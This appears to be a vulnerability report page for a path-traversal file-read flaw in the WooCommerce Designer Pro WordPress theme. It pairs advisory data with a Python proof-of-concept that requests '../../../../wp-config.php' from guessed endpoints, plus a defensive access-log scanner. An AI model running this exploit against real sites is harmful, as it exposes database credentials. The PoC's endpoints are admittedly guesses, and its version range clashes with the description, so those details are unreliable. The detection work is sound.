Security Vulnerability Report
CVE-2025-10897 (CVSS 8.6, HIGH)

Published: 2025-10-31 08:15:36
Last Modified: 2026-04-15 00:35:42

Description

The WooCommerce Designer Pro theme for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 1.9.28. This makes it possible for unauthenticated attackers to read arbitrary files on the server, which can expose DB credentials when the wp-config.php file is read.

CVSS Details

CVSS Score: 8.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
(Attack Vector: Network; Attack Complexity: Low; Privileges Required: None; User Interaction: None; Scope: Changed; Confidentiality: High; Integrity: None; Availability: None)
Weakness: CWE-22 (path traversal), as recorded in the raw record below

Configurations (Affected Products)

No configuration data available.

WooCommerce Designer Pro theme < 1.9.28

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-10897 PoC - Arbitrary File Read in WooCommerce Designer Pro theme
# Target: WordPress site with WooCommerce Designer Pro theme <= 1.9.28
target_url = "http://target-site.com/wp-content/plugins/woocommerce-designer-pro/includes/upload.php"

# Read wp-config.php
payload = {
    "file_path": "../../../../wp-config.php"
}

try:
    response = requests.post(target_url, data=payload, timeout=10)
    if response.status_code == 200:
        print("[+] Successfully read wp-config.php")
        print(response.text)
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Alternative endpoint (may vary based on version)
alt_url = "http://target-site.com/wp-content/themes/woocommerce-designer-pro/inc/download.php"
alt_payload = {
    "file": "../../../../wp-config.php"
}

try:
    response = requests.get(alt_url, params=alt_payload, timeout=10)
    if response.status_code == 200:
        print("[+] Successfully read file via alternative endpoint")
        print(response.text)
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")
```
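
As a defender-side companion to the PoC above, the following Python scans combined-format web access log lines for traversal attempts against the two endpoint paths the PoC names and reports which ones returned HTTP 200. This is an added example, not part of the original report and not code from the theme; the log lines and IP addresses are constructed for the example, and the endpoint paths and parameter names are taken from the PoC (which notes they may vary between versions).

```python
"""Access-log detection for CVE-2025-10897-style traversal probes.

Constructed example: SAMPLE_LOG is made up; WATCHED_PATHS and FILE_PARAMS
come from the PoC on this page and may not match every theme version.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint paths named in the PoC above.
WATCHED_PATHS = (
    "/wp-content/plugins/woocommerce-designer-pro/includes/upload.php",
    "/wp-content/themes/woocommerce-designer-pro/inc/download.php",
)
# Parameter names the PoC sends the file path in.
FILE_PARAMS = ("file_path", "file")

# Apache/nginx "combined" format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %252e%252e%252f -> ../)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(value):
    """True if a decoded parameter value tries to climb out of its directory."""
    v = fully_decode(value).replace("\\", "/")
    return "../" in v or v.startswith("/") or "\x00" in v


def classify_request(target):
    """Return (reason, decoded_value) when a request target carries a
    traversal payload to a watched endpoint, else None."""
    parts = urlsplit(target)
    if fully_decode(parts.path) not in WATCHED_PATHS:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    for name in FILE_PARAMS:
        for raw in params.get(name, []):
            if is_traversal(raw):
                return (f"traversal in {name}", fully_decode(raw))
    return None


def scan_access_log(lines):
    """Return a list of findings. A 200 on a traversal request means the file
    read probably succeeded. POST bodies are not in standard access logs, so a
    POST to a watched endpoint is only flagged at low confidence."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        status = int(m["status"])
        hit = classify_request(m["target"])
        if hit:
            reason, value = hit
            findings.append({"ip": m["ip"], "reason": reason, "value": value,
                             "status": status, "confidence": "high"})
        elif m["method"] == "POST" and fully_decode(urlsplit(m["target"]).path) in WATCHED_PATHS:
            findings.append({"ip": m["ip"], "reason": "POST to watched endpoint (body not logged)",
                             "value": None, "status": status, "confidence": "low"})
    return findings


# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [31/Oct/2025:09:01:02 +0000] "GET /wp-content/themes/woocommerce-designer-pro/inc/download.php?file=../../../../wp-config.php HTTP/1.1" 200 3121',
    '203.0.113.7 - - [31/Oct/2025:09:01:05 +0000] "GET /wp-content/themes/woocommerce-designer-pro/inc/download.php?file=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 3121',
    '203.0.113.7 - - [31/Oct/2025:09:01:09 +0000] "POST /wp-content/plugins/woocommerce-designer-pro/includes/upload.php HTTP/1.1" 200 3121',
    '198.51.100.2 - - [31/Oct/2025:09:02:00 +0000] "GET /wp-content/themes/woocommerce-designer-pro/inc/download.php?file=design-42.pdf HTTP/1.1" 200 88123',
    '198.51.100.9 - - [31/Oct/2025:09:03:00 +0000] "GET /?p=12 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

A high-confidence finding with status 200 should be treated as a likely disclosure of wp-config.php: rotate the database credentials and WordPress salts it contains, then update the theme. Because access logs omit POST bodies, the upload.php variant can only be confirmed with request-body logging (a WAF or application-level log); on its own the low-confidence entry is a lead, not proof.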

References

https://codecanyon.net/item/woocommerce-designer-pro-cmyk-card-flyer/22027731
https://www.wordfence.com/threat-intel/vulnerabilities/id/3a47cdeb-bd05-4e7e-99dc-dca67064182a?source=cve

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-10897", "sourceIdentifier": "[email protected]", "published": "2025-10-31T08:15:36.383", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WooCommerce Designer Pro theme for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 1.9.28. This makes it possible for unauthenticated attackers to read arbitrary files on the server, which can expose DB credentials when the wp-config.php file is read."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://codecanyon.net/item/woocommerce-designer-pro-cmyk-card-flyer/22027731", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3a47cdeb-bd05-4e7e-99dc-dca67064182a?source=cve", "source": "[email protected]"}]}}
```